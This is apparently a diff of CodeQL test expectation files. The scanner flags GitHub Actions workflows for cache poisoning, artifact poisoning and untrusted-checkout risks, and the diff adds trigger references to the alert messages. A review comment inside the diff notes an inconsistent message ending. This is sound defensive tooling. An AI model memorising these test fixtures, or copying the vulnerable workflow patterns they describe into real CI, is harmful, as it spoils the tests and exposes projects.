-| .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. |
+| .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment |
+| .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment |
+| .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). 
| .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment |
+| .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step2.yml:5:3:5:21 | pull_request_target | pull_request_target |
+| .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step3.yml:4:3:4:21 | pull_request_target | pull_request_target |
+| .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step4.yml:3:3:3:21 | pull_request_target | pull_request_target |
+| .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step5.yml:3:3:3:21 | pull_request_target | pull_request_target |
diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected
index 418aeeea059e..da66ff822a39 100644
--- a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected 
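Review bot: The new-side alert text in this hunk ends with a doubled sentence end, `untrusted code. ($@).`, whereas every other query updated in this commit (CachePoisoningViaCodeInjection, UntrustedCheckoutTOCTOUCritical/High, ArtifactPoisoningCritical) reads `... ($@).` with the trigger reference inside the sentence. The message string lives in the query's select clause, which is outside this diff; I would change it to `Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code ($@).` and regenerate this .expected file so the seven rows here match. Consistent message shape also matters for anyone filtering or deduplicating SARIF results on message text.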
+++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected 
@@ -97,13 +97,13 @@ edges
 | .github/workflows/test6.yml:224:7:232:4 | Uses Step | .github/workflows/test6.yml:232:7:252:4 | Uses Step |
 | .github/workflows/test6.yml:232:7:252:4 | Uses Step | .github/workflows/test6.yml:252:7:253:45 | Run Step |
 #select
-| .github/workflows/comment.yml:58:9:60:2 | Run Step | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. |
-| .github/workflows/comment.yml:68:9:68:43 | Run Step | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. |
-| .github/workflows/test0.yml:58:9:60:2 | Run Step | .github/workflows/test0.yml:54:9:58:6 | Uses Step | .github/workflows/test0.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. |
-| .github/workflows/test0.yml:68:9:68:43 | Run Step | .github/workflows/test0.yml:64:9:68:6 | Uses Step | .github/workflows/test0.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. |
-| .github/workflows/test4.yml:85:7:88:54 | Uses Step | .github/workflows/test4.yml:79:7:85:4 | Uses Step | .github/workflows/test4.yml:85:7:88:54 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. |
-| .github/workflows/test5.yml:151:7:156:4 | Uses Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:151:7:156:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. |
-| .github/workflows/test5.yml:156:7:169:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:156:7:169:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. 
|
-| .github/workflows/test5.yml:169:7:180:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:169:7:180:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. |
-| .github/workflows/test6.yml:213:7:218:4 | Uses Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:213:7:218:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. |
-| .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:218:7:224:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. |
+| .github/workflows/comment.yml:58:9:60:2 | Run Step | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment |
+| .github/workflows/comment.yml:68:9:68:43 | Run Step | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment |
+| .github/workflows/test0.yml:58:9:60:2 | Run Step | .github/workflows/test0.yml:54:9:58:6 | Uses Step | .github/workflows/test0.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment |
+| .github/workflows/test0.yml:68:9:68:43 | Run Step | .github/workflows/test0.yml:64:9:68:6 | Uses Step | .github/workflows/test0.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). 
| .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment |
+| .github/workflows/test4.yml:85:7:88:54 | Uses Step | .github/workflows/test4.yml:79:7:85:4 | Uses Step | .github/workflows/test4.yml:85:7:88:54 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test4.yml:5:3:5:15 | issue_comment | issue_comment |
+| .github/workflows/test5.yml:151:7:156:4 | Uses Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:151:7:156:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment |
+| .github/workflows/test5.yml:156:7:169:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:156:7:169:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment |
+| .github/workflows/test5.yml:169:7:180:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:169:7:180:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment |
+| .github/workflows/test6.yml:213:7:218:4 | Uses Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:213:7:218:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment |
+| .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:218:7:224:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). 
| .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment |
diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected
index 3a001efbbe8a..4f7149b69803 100644
--- a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected
+++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected
@@ -1,2 +1,2 @@
-| .github/workflows/test6.yml:42:7:47:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. |
-| .github/workflows/test6.yml:92:7:97:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. |
+| .github/workflows/test6.yml:42:7:47:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment |
+| .github/workflows/test6.yml:92:7:97:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment |
diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected
index fd3c1fbc195f..aa0057d60a1b 100644
--- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected
+++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected 
@@ -52,20 +52,20 @@ nodes
 | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | semmle.label | ./gradlew buildScanPublishPrevious\n |
 subpaths
 #select
-| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build |
-| .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | python foo/x.py |
-| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | sh foo/cmd\n |
-| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | sh cmd |
-| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | ./foo/cmd |
-| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n |
-| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n |
-| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | npm install\nnpm run lint\n |
-| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | ./foo/cmd |
-| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | ./cmd |
-| .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n |
-| .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | python test.py |
-| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Uses Step |
-| .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | make snapshot |
-| .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n |
-| .github/workflows/test18.yml:36:15:40:58 | Uses Step | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Uses Step |
-| .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | ./gradlew buildScanPublishPrevious\n |
+| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:4:3:4:14 | workflow_run | workflow_run |
+| .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | python foo/x.py | .github/workflows/artifactpoisoning12.yml:4:3:4:14 | workflow_run | workflow_run |
+| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:4:3:4:14 | workflow_run | workflow_run |
+| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | sh cmd | .github/workflows/artifactpoisoning22.yml:4:3:4:14 | workflow_run | workflow_run |
+| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:4:3:4:14 | workflow_run | workflow_run |
+| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | .github/workflows/artifactpoisoning32.yml:4:3:4:14 | workflow_run | workflow_run |
+| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | .github/workflows/artifactpoisoning33.yml:4:3:4:14 | workflow_run | workflow_run |
+| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | npm install\nnpm run lint\n | .github/workflows/artifactpoisoning34.yml:4:3:4:14 | workflow_run | workflow_run |
+| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:4:3:4:14 | workflow_run | workflow_run |
+| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | ./cmd | .github/workflows/artifactpoisoning42.yml:4:3:4:14 | workflow_run | workflow_run |
+| .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:4:5:4:16 | workflow_run | workflow_run |
+| .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | python test.py | .github/workflows/artifactpoisoning81.yml:3:5:3:23 | pull_request_target | pull_request_target |
+| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Uses Step | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run |
+| .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | make snapshot | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run |
+| .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | .github/workflows/artifactpoisoning101.yml:4:3:4:21 | pull_request_target | pull_request_target |
+| .github/workflows/test18.yml:36:15:40:58 | Uses Step | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Uses Step | .github/workflows/test18.yml:3:5:3:16 | workflow_run | workflow_run |
+| .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | ./gradlew buildScanPublishPrevious\n | .github/workflows/test25.yml:2:3:2:14 | workflow_run | workflow_run | 
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
index ec6a664a7abf..35d61dac5faf 100644
--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -312,43 +312,43 @@ edges | .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | | .github/workflows/workflow_run_untrusted_checkout_3.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_3.yml:16:9:18:31 | Uses Step | #select -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller1.yaml | -| .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | -| .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | -| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | -| 
.github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | -| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | -| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | -| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | 